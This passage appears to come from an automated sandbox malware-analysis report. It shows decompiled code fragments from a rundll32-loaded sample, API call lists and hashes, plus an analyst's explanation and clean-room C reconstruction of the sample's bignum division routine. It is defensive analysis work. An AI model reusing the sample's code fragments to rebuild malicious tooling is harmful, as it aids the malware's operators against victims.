                                             				/* 049f5d9e */ _push(__eax);
                                             				/* 049f5da2 */ _t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                             				/* 049f5da8 */ if(_t118 >= 0) {
                                             					/* 049f5dae */ _t54 = _v8;
                                             					/* 049f5db7 */ _t103 =  *0x49fa348; // 0x57d5a8
                                             					/* 049f5dbd */ _t5 = _t103 + 0x49fb038; // 0x3050f485
                                             					/* 049f5dc7 */ _t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                             					/* 049f5dc9 */ _t56 = _v8;
                                             					/* 049f5dcf */ _t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                             					/* 049f5dd4 */ if(_t118 >= 0) {
                                             						/* 049f5ddf */ __imp__#2(0x49f9290);
                                             						/* 049f5de5 */ _v28 = _t57;
                                             						/* 049f5dea */ if(_t57 == 0) {
                                             							/* 049f5f0c */ _t118 = 0x8007000e;
                                             						/* 049f5df0 */ } else {
                                             							/* 049f5df0 */ _t60 = _v32;
                                             							/* 049f5dfd */ _t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                             							/* 049f5e03 */ _t87 = __imp__#6;
                                             							/* 049f5e09 */ _t118 = _t61;
                                             							/* 049f5e0d */ if(_t118 >= 0) {
                                             								/* 049f5e13 */ _t63 = _v24;
                                             								/* 049f5e20 */ _t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                             								/* 049f5e24 */ if(_t118 >= 0) {
                                             									/* 049f5e2a */ _t130 = _v20;
                                             									/* 049f5e2d */ if(_t130 != 0) {
                                             										/* 049f5e35 */ _t67 = 3;
                                             										/* 049f5e36 */ _v64 = _t67;
                                             										/* 049f5e3a */ _v48 = _t67;
                                             										/* 049f5e3e */ _v56 = 0;
                                             										/* 049f5e41 */ _v40 = 0;
                                             										/* 049f5e44 */ if(_t130 > 0) {
                                             											/* 049f5e4a */ while(1) {
                                             												/* 049f5e53 */ _t68 = _v24;
                                             												/* 049f5e59 */ asm("movsd");
                                             												/* 049f5e5a */ asm("movsd");
                                             												/* 049f5e5d */ asm("movsd");
                                             												/* 049f5e5e */ asm("movsd");
                                             												/* 049f5e5f */ _t123 = _t123;
                                             												/* 049f5e67 */ asm("movsd");
                                             												/* 049f5e68 */ asm("movsd");
                                             												/* 049f5e69 */ asm("movsd");
                                             												/* 049f5e6b */ asm("movsd");
                                             												/* 049f5e6f */ _t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                             												/* 049f5e73 */ if(_t118 < 0) {
                                             													goto L16;
                                             												}
                                             												/* 049f5e79 */ _t70 = _v8;
                                             												/* 049f5e82 */ _t109 =  *0x49fa348; // 0x57d5a8
                                             												/* 049f5e88 */ _t28 = _t109 + 0x49fb0bc; // 0x3050f1ff
                                             												/* 049f5e92 */ _t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                             												/* 049f5e96 */ if(_t118 >= 0) {
                                             													/* 049f5e98 */ _t75 = _v16;
                                             													/* 049f5ea5 */ _t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                             													/* 049f5ea9 */ if(_t118 >= 0 && _v12 != 0) {
                                             														/* 049f5eb1 */ _t79 =  *0x49fa348; // 0x57d5a8
                                             														/* 049f5eb6 */ _t33 = _t79 + 0x49fb078; // 0x76006f
                                             														/* 049f5ec8 */ if(lstrcmpW(_v12, _t33) == 0) {
                                             															/* 049f5eca */ _t83 = _v16;
                                             															/* 049f5ed0 */  *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                             														/* 049f5ed0 */ }
                                             														/* 049f5ed9 */  *_t87(_v12);
                                             													/* 049f5ed9 */ }
                                             													/* 049f5edb */ _t77 = _v16;
                                             													/* 049f5ee1 */  *((intOrPtr*)( *_t77 + 8))(_t77);
                                             												/* 049f5ee1 */ }
                                             												/* 049f5ee4 */ _t72 = _v8;
                                             												/* 049f5eea */  *((intOrPtr*)( *_t72 + 8))(_t72);
                                             												/* 049f5eed */ _v40 = _v40 + 1;
                                             												/* 049f5ef6 */ if(_v40 < _v20) {
                                             													continue;
                                             												}
                                             												goto L16;
                                             											/* 049f5ef6 */ }
                                             										/* 049f5e4a */ }
                                             									/* 049f5e44 */ }
                                             								/* 049f5e2d */ }
                                             								/* 049f5efc */ L16:
                                             								/* 049f5efc */ _t65 = _v24;
                                             								/* 049f5f02 */  *((intOrPtr*)( *_t65 + 8))(_t65);
                                             							/* 049f5f02 */ }
                                             							/* 049f5f08 */  *_t87(_v28);
                                             						/* 049f5f08 */ }
                                             						/* 049f5f11 */ _t58 = _v32;
                                             						/* 049f5f17 */  *((intOrPtr*)( *_t58 + 8))(_t58);
                                             					/* 049f5f17 */ }
                                             				/* 049f5dd4 */ }
                                             				/* 049f5f20 */ return _t118;
                                             			}

                                            APIs
                                            • SysAllocString.OLEAUT32(049F9290), ref: 049F5DDF
                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 049F5EC0
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F5ED9
                                            • SysFreeString.OLEAUT32(?), ref: 049F5F08
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloclstrcmp
                                            • String ID:
                                            • API String ID: 1885612795-0
                                            • Opcode ID: 3211b8e9c60bf01e80847360493731d711f699f3ec55d3cf906b25dcc99d60a3
                                            • Instruction ID: 719dc589eee52a79aeac25752b2265185cde37b0a87e408a4da203d2c38fad24
                                            • Opcode Fuzzy Hash: 3211b8e9c60bf01e80847360493731d711f699f3ec55d3cf906b25dcc99d60a3
                                            • Instruction Fuzzy Hash: 56513D75D00519EFCB00DFA8C888DAEB7B9FF88710B2585A5E915EB211D771AD41CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?), ref: 05822891
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • ResetEvent.KERNEL32(?,?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9), ref: 05822908
                                            • GetLastError.KERNEL32(?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 05822935
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • GetLastError.KERNEL32(?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 058229F7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                            • String ID:
                                            • API String ID: 943265810-0
                                            • Opcode ID: a06d571e6b7997d6405c0564fad723aa687f28a403603730fc7ab797c2cebd4e
                                            • Instruction ID: 11208f48985e2696a08ab647f315766aa4f3551aca7cab3fd6255ee387b9a015
                                            • Opcode Fuzzy Hash: a06d571e6b7997d6405c0564fad723aa687f28a403603730fc7ab797c2cebd4e
                                            • Instruction Fuzzy Hash: C4414DB6610215BFDB209FA4CC89EAB7EADFB04704F044A29FD53D6590DB71ED849A20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E049F35A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				void _v156;
                                            				void _v428;
                                            				void* _t55;
                                            				unsigned int _t56;
                                            				signed int _t66;
                                            				signed int _t74;
                                            				void* _t76;
                                                       				signed int _t79;
                                                       				void* _t81;
                                                       				void* _t92;
                                                       				void* _t96;
                                                       				signed int* _t99;
                                                       				signed int _t101;
                                                       				signed int _t103;
                                                       				void* _t107;

                                             0x049f35a5				_t92 = _a12;
                                             0x049f35b1				_t101 = __eax;
                                             0x049f35b7				_t55 = E049F13E0(_a16, _t92);
                                             0x049f35bc				_t79 = _t55;
                                             0x049f35c0				if(_t79 == 0) {
                                             0x049f3732					L18:
                                             0x049f3736					return _t55;
                                             0x049f3736				}
                                             0x049f35c6				_t56 =  *(_t92 + _t79 * 4 - 4);
                                             0x049f35ca				_t81 = 0;
                                             0x049f35ce				_t96 = 0x20;
                                             0x049f35d1				if(_t56 == 0) {
                                             0x049f35dc					L4:
                                             0x049f35e2					_t97 = _t96 - _t81;
                                             0x049f35e7					_v12 = _t96 - _t81;
                                             0x049f35ea					E049F7099(_t79,  &_v428);
                                             0x049f3604					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E049F381E(_t101,  &_v428, _a8, _t96 - _t81);
                                             0x049f3613					E049F381E(_t79,  &_v156, _a12, _t97);
                                             0x049f361f					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                             0x049f3629					_t66 = E049F7099(_t101, 0x49fa1d0);
                                             0x049f362e					_t103 = _t101 - _t79;
                                             0x049f3630					_a8 = _t103;
                                             0x049f3633					if(_t103 < 0) {
                                             0x049f36ea						L17:
                                             0x049f36f0						E049F7099(_a16, _a4);
                                             0x049f3701						E049F4191(_t79,  &_v428, _a4, _t97);
                                             0x049f3714						memset( &_v428, 0, 0x10c);
                                             0x049f372a						_t55 = memset( &_v156, 0, 0x84);
                                             0x00000000						goto L18;
                                             0x049f372f					}
                                             0x049f363c					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                             0x049f3643					do {
                                             0x049f3647						if(_v8 != 0xffffffff) {
                                             0x049f364d							_push(1);
                                             0x049f364f							_push(0);
                                             0x049f3651							_push(0);
                                             0x049f3653							_push( *_t99);
                                             0x049f3655							L049F81CA();
                                             0x049f365f							_t74 = _t66 +  *(_t99 - 4);
                                             0x049f3664							asm("adc edx, esi");
                                             0x049f3666							_push(0);
                                             0x049f3668							_push(_v8 + 1);
                                             0x049f3669							_push(_t92);
                                             0x049f366a							_push(_t74);
                                             0x049f366b							L049F81C4();
                                             0x049f3672							if(_t92 > 0 || _t74 > 0xffffffff) {
                                             0x049f3679								_t74 = _t74 | 0xffffffff;
                                             0x049f367c								_v16 = _v16 & 0x00000000;
                                             0x049f367c							}
                                             0x049f3649						} else {
                                             0x049f3649							_t74 =  *_t99;
                                             0x049f3649						}
                                             0x049f3684						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                             0x049f368c						_a12 = _t74;
                                             0x049f3698						_t76 = E049F3ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                             0x049f369d						while(1) {
                                             0x049f369d							 *_t99 =  *_t99 - _t76;
                                             0x049f36a2							if( *_t99 != 0) {
                                             0x00000000								goto L14;
                                             0x00000000							}
                                             0x049f36a4							L13:
                                             0x049f36a7							_t92 =  &_v156;
                                             0x049f36b4							if(E049F40E5(_t79, _t92, _t106) < 0) {
                                             0x00000000								break;
                                             0x00000000							}
                                             0x049f36b6							L14:
                                             0x049f36b6							_a12 = _a12 + 1;
                                             0x049f36c3							_t76 = E049F5908(_t79,  &_v156, _t106, _t106);
                                             0x049f369d							 *_t99 =  *_t99 - _t76;
                                             0x049f36a2							if( *_t99 != 0) {
                                             0x00000000								goto L14;
                                             0x00000000							}
                                             0x00000000							goto L13;
                                             0x049f36a2						}
                                             0x049f36cd						_a8 = _a8 - 1;
                                             0x049f36d0						_t66 = _a12;
                                             0x049f36d3						_t99 = _t99 - 4;
                                             0x049f36da						 *(0x49fa1d0 + _a8 * 4) = _t66;
                                             0x049f36da					} while (_a8 >= 0);
                                             0x049f36e7					_t97 = _v12;
                                             0x00000000					goto L17;
                                             0x049f36e7				}
                                             0x049f35d3				while(_t81 < _t96) {
                                             0x049f35d7					_t81 = _t81 + 1;
                                             0x049f35d8					_t56 = _t56 >> 1;
                                             0x049f35da					if(_t56 != 0) {
                                             0x00000000						continue;
                                             0x00000000					}
                                             0x00000000					goto L4;
                                             0x049f35da				}
                                             0x00000000				goto L4;
                                                       			}

                                            APIs
                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 049F3655
                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 049F366B
                                            • memset.NTDLL ref: 049F3714
                                            • memset.NTDLL ref: 049F372A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset$_allmul_aulldiv
                                            • String ID:
                                            • API String ID: 3041852380-0
                                            • Opcode ID: e76886fcf6c5f9bffccc551179ccb61fff3b59b4956127c7aafa6f41314ef0ef
                                            • Instruction ID: 954306416d528e0f206fb0da2ca837a4571c6f00058091e866b23fe9d871f35c
                                            • Opcode Fuzzy Hash: e76886fcf6c5f9bffccc551179ccb61fff3b59b4956127c7aafa6f41314ef0ef
                                            • Instruction Fuzzy Hash: 6E41A071B00219AFEB209E68CC81BEE7779EF85314F104579FE19A7280DB74BE558B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%
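                                             Reading the listing at 0x049f35a5 above (the entry at 05817126 in the 0x05800000 dump carries the same API ID, memset$_allmul_aulldiv, and is the same routine after relocation): E049F13E0 returns the significant limb count of the divisor, the 0x20-minus-bitlength loop computes a normalisation shift, E049F381E shifts both operands left by it, the _allmul/_aulldiv pair estimates each quotient limb as (top two limbs) / (top divisor limb + 1) with a clamp to 0xffffffff and a special case when that limb is already 0xffffffff, E049F3ADE multiply-subtracts, the L13/L14 loop corrects upward while the partial remainder is still >= the divisor, quotient limbs are stored in the global at 0x49fa1d0, and E049F4191 shifts the remainder back into _a4 before both work buffers are wiped. That is schoolbook multi-precision long division with an underestimating quotient step; a hand-rolled bignum divide in a loader usually serves modular arithmetic, and the 0x84-byte (33-limb) divisor buffer is consistent with 1024-bit operands, though the report itself does not state what the routine is used for. The C below is an added, clean-room reconstruction of that algorithm written for this report, not code recovered from the sample; the function names (mp_divmod, mp_mulsub and the rest), the buffer limits derived from the two memset sizes, and the choice to return the quotient through a caller buffer instead of a global are all assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Limits chosen to mirror the listing's zeroed work buffers: 0x10c bytes (67 limbs)
 * for the dividend and 0x84 bytes (33 limbs) for the divisor, i.e. up to 66
 * dividend limbs and 32 divisor limbs (1024 bits). This is an inference from the
 * memset sizes, not a constant recovered from the sample. Limbs are little-endian
 * 32-bit words, as in the listing. */
#define MP_DVD_LIMBS 66
#define MP_DSR_LIMBS 32

/* Significant limb count (index of the top non-zero limb + 1). */
static size_t mp_len(const uint32_t *a, size_t n) {
    while (n > 0 && a[n - 1] == 0) n--;
    return n;
}

/* r[0..n-1] = a << s (s < 32); returns the bits shifted out, which become limb n. */
static uint32_t mp_shl(uint32_t *r, const uint32_t *a, size_t n, unsigned s) {
    uint32_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t t = ((uint64_t)a[i] << s) | carry;
        r[i] = (uint32_t)t;
        carry = (uint32_t)(t >> 32);
    }
    return carry;
}

/* r[0..n-1] = a[0..n] >> s (s < 32): undoes the normalisation on the remainder. */
static void mp_shr(uint32_t *r, const uint32_t *a, size_t n, unsigned s) {
    for (size_t i = 0; i < n; i++)
        r[i] = (uint32_t)((((uint64_t)a[i + 1] << 32) | a[i]) >> s);
}

/* Compare n limbs from the top: 1 if a > b, -1 if a < b, 0 if equal. */
static int mp_cmp(const uint32_t *a, const uint32_t *b, size_t n) {
    while (n-- > 0)
        if (a[n] != b[n]) return a[n] > b[n] ? 1 : -1;
    return 0;
}

/* a[0..n-1] -= b[0..n-1]; returns the borrow out of the top limb. */
static uint32_t mp_sub(uint32_t *a, const uint32_t *b, size_t n) {
    uint32_t borrow = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t t = (uint64_t)a[i] - b[i] - borrow;
        a[i] = (uint32_t)t;
        borrow = (t >> 32) != 0;
    }
    return borrow;
}

/* u[0..n] -= q * v[0..n-1]; u[n] is the extra top limb of the partial remainder. */
static void mp_mulsub(uint32_t *u, const uint32_t *v, size_t n, uint32_t q) {
    uint32_t carry = 0, borrow = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t p = (uint64_t)q * v[i] + carry;
        carry = (uint32_t)(p >> 32);
        uint64_t t = (uint64_t)u[i] - (uint32_t)p - borrow;
        u[i] = (uint32_t)t;
        borrow = (t >> 32) != 0;
    }
    u[n] -= carry + borrow;
}

/* q[0..m-1] = a / b and r[0..nb-1] = a % b for a of m limbs and b of nb limbs.
 * Returns -1 for a zero divisor or operands beyond the buffer limits, else 0. */
int mp_divmod(uint32_t *q, uint32_t *r, const uint32_t *a, size_t m,
              const uint32_t *b, size_t nb) {
    uint32_t u[MP_DVD_LIMBS + 1], v[MP_DSR_LIMBS + 1];
    size_t n = mp_len(b, nb);
    if (n == 0 || m > MP_DVD_LIMBS || n > MP_DSR_LIMBS) return -1;

    /* Normalise: shift both operands left until the divisor's top limb has its
     * high bit set (the listing's 0x20 - bitlength computation). */
    unsigned s = 0;
    for (uint32_t t = b[n - 1]; !(t & 0x80000000u); t <<= 1) s++;
    memset(u, 0, sizeof u);
    memset(v, 0, sizeof v);
    u[m] = mp_shl(u, a, m, s);
    mp_shl(v, b, n, s);
    uint32_t vtop = v[n - 1];
    memset(q, 0, m * sizeof *q);

    for (ptrdiff_t j = (ptrdiff_t)m - (ptrdiff_t)n; j >= 0; j--) {
        uint32_t *uj = u + j;
        /* Estimate the quotient limb from the top two limbs over (vtop + 1). This
         * never overshoots, so only upward corrections are needed; dividing by
         * vtop + 1 in 64-bit arithmetic also covers the vtop == 0xffffffff case the
         * listing special-cases. The clamp mirrors the listing's 0xffffffff fallback. */
        uint64_t num = ((uint64_t)uj[n] << 32) | uj[n - 1];
        uint64_t qhat = num / ((uint64_t)vtop + 1);
        if (qhat > 0xffffffffULL) qhat = 0xffffffffULL;
        mp_mulsub(uj, v, n, (uint32_t)qhat);
        /* Correct upward while the partial remainder is still >= v. */
        while (uj[n] != 0 || mp_cmp(uj, v, n) >= 0) {
            uj[n] -= mp_sub(uj, v, n);
            qhat++;
        }
        q[j] = (uint32_t)qhat;
    }
    memset(r, 0, nb * sizeof *r);
    mp_shr(r, u, n, s);   /* remainder sits in u[0..n]; shift the normalisation out */
    return 0;
}
```

                                             For an analyst the useful part is the shape, not the arithmetic: a function that calls _allmul then _aulldiv inside a loop, keeps a 33-limb and a 67-limb stack buffer, and wipes both with memset on exit is a bignum divide, and its callers are where the key material and the data being reduced will be found.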

                                            APIs
                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05817126
                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0581713C
                                            • memset.NTDLL ref: 058171E5
                                            • memset.NTDLL ref: 058171FB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$_allmul_aulldiv
                                            • String ID:
                                            • API String ID: 3041852380-0
                                            • Opcode ID: c49a0f318c282d35742b1709aabc06419a9846a1e6bea84fa3ac57cd705e165e
                                            • Instruction ID: 8484d2410e601bba4b9ae39d78d2e941548635d897910f839f648a8e968be121
                                            • Opcode Fuzzy Hash: c49a0f318c282d35742b1709aabc06419a9846a1e6bea84fa3ac57cd705e165e
                                            • Instruction Fuzzy Hash: 61419D71B00219ABDB20EF6CDC44BEE7769EF45710F004569FD1AEB280DB70AE448B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 05807FAA
                                            • StrChrA.SHLWAPI(?,0000005C), ref: 05807FD1
                                            • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 05807FF7
                                            • lstrcpy.KERNEL32(?,?), ref: 0580809B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrcpyn
                                            • String ID:
                                            • API String ID: 4154805583-0
                                            • Opcode ID: 7817f710975373b806319f5dc8c4d1fc97b99e819f40af34e89c7d201a4e4359
                                            • Instruction ID: 0d80da3a61896616f843fee73bf7264d5dcabdf75bd23e3f37239204dba7bb35
                                            • Opcode Fuzzy Hash: 7817f710975373b806319f5dc8c4d1fc97b99e819f40af34e89c7d201a4e4359
                                            • Instruction Fuzzy Hash: 81414A76910219AFDB519BA4CD88DEE7FBCFB08250F0484A6F905E3180DA34AE48CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strupr
                                            • String ID:
                                            • API String ID: 3408778250-0
                                            • Opcode ID: e8c21fd9941afc54d1623a5be6ae26d920e527db24a6efd8da56f4ccfc2b187f
                                            • Instruction ID: 21d7be087e5102f53b10a9c04b8a9b842214876a5224c7ecb1d89b49f74624c1
                                            • Opcode Fuzzy Hash: e8c21fd9941afc54d1623a5be6ae26d920e527db24a6efd8da56f4ccfc2b187f
                                            • Instruction Fuzzy Hash: 0B412C71901319AFDF60DFA8DC88AAEBBA9BF44350F148816EC15D6051D778E885CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ResetEvent.KERNEL32(?), ref: 058053C3
                                            • GetLastError.KERNEL32 ref: 058053DC
                                              • Part of subcall function 0580E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05822953,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000), ref: 0580E564
                                            • ResetEvent.KERNEL32(?), ref: 05805455
                                            • GetLastError.KERNEL32 ref: 05805470
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorEventLastReset$MultipleObjectsWait
                                            • String ID:
                                            • API String ID: 2394032930-0
                                            • Opcode ID: 2bb99d669ee9f68266e092850f40887ee16027e30d77de26881023cb286502e1
                                            • Instruction ID: 5aae9c5c1e940cffcc6f0e6bb5fa2e7eae89c0070a9d7d4bf084b050c5f10ad3
                                            • Opcode Fuzzy Hash: 2bb99d669ee9f68266e092850f40887ee16027e30d77de26881023cb286502e1
                                            • Instruction Fuzzy Hash: C831D572600A04ABCBE19BA4CC44EAE7BBAFF84262F255564FD15D31D0EB70ED418F20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580FA32: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 0580FA40
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581CFB6
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0581D007
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 0581D03C
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001,?,?,?,?,?,?,05809EB6,?), ref: 0581D04C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                            • String ID:
                                            • API String ID: 4200334623-0
                                            • Opcode ID: c66474ada0a4cc23945936632876e72f692bfe9adea924a9060a31c9ab7e7c80
                                            • Instruction ID: 03a9e823eff0d4f0c7cfefb67d86424048fac8b6f13afd34d5d2963e7768f1e6
                                            • Opcode Fuzzy Hash: c66474ada0a4cc23945936632876e72f692bfe9adea924a9060a31c9ab7e7c80
                                            • Instruction Fuzzy Hash: 05312A76611119BFEB209FA4DC89CAEBFBDFF08250B108065FE06D3120DB71AD919B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0580E63F
                                            • SetEvent.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 0580E64F
                                            • GetLastError.KERNEL32 ref: 0580E6D8
                                              • Part of subcall function 0580E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05822953,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000), ref: 0580E564
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • GetLastError.KERNEL32(00000000), ref: 0580E70D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                            • String ID:
                                            • API String ID: 602384898-0
                                            • Opcode ID: 3fddeb8c421cddd122c0d929cf3267378af4e33982a4babfb65cc30572afc6ea
                                            • Instruction ID: 001de75b0f839cc1d6885808ee7595f0be8c24b6fdcc3c22b5d2c97f567e15d6
                                            • Opcode Fuzzy Hash: 3fddeb8c421cddd122c0d929cf3267378af4e33982a4babfb65cc30572afc6ea
                                            • Instruction Fuzzy Hash: B031DDB5900309EFDB60DFA5DC849AFBBBDBF08204F10596AE952D2690D731EA449F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • TlsGetValue.KERNEL32(?), ref: 058193D6
                                            • SetEvent.KERNEL32(?), ref: 05819420
                                            • TlsSetValue.KERNEL32(00000001), ref: 0581945A
                                            • TlsSetValue.KERNEL32(00000000), ref: 05819476
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value$Event
                                            • String ID:
                                            • API String ID: 3803239005-0
                                            • Opcode ID: dc9f38e2ffac39c507879ac6d1665b1c849f9c13c9d3e943d5c57c3631333d87
                                            • Instruction ID: f8f346a5077af5f44e2ff9c6cfb44001b2ca2f1e66ce7296c0e953b212370af0
